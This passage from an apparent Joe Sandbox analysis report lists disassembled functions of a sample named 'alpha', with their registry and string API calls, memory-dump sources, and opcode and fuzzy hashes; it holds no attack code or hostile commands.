                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB1998D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2714550308-1656466771
                                              • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                              • Instruction ID: 066514ba7933842922cd880d7662a6ff2c702969be1fc716b82f63d2f26873b9
                                              • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                              • Instruction Fuzzy Hash: 3241E333A0979681EA00DB16D4442B963A4FB8DBE8F508134DA5D837F5EF3AE846C349
                                              Function 00007FF6EB19A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19A0FC
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19A1FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2714550308-1656466771
                                              • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                              • Instruction ID: 77ab1895bddaabd542434f17aca530fee6fd7b1ad717c390fdc28c1049055b1e
                                              • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                              • Instruction Fuzzy Hash: 4B41C323A19796C1EA00DB15D4446B963A4FB8DBE8F508131DA5D837F4DF3AE84AC389
                                              Function 00007FF6EB173BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp
                                              • String ID: /-Y
                                              • API String ID: 1886669725-4274875248
                                              • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                              • Instruction ID: 546cf248ef1937a6560cdfaa568024d4d6d61491d19ee941c16710dd2c2752d0
                                              • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                              • Instruction Fuzzy Hash: 2A21A667E0876581EA105B02A6443B876A0BB4DFE4F444032DE89877E4DF7EE4A2D70A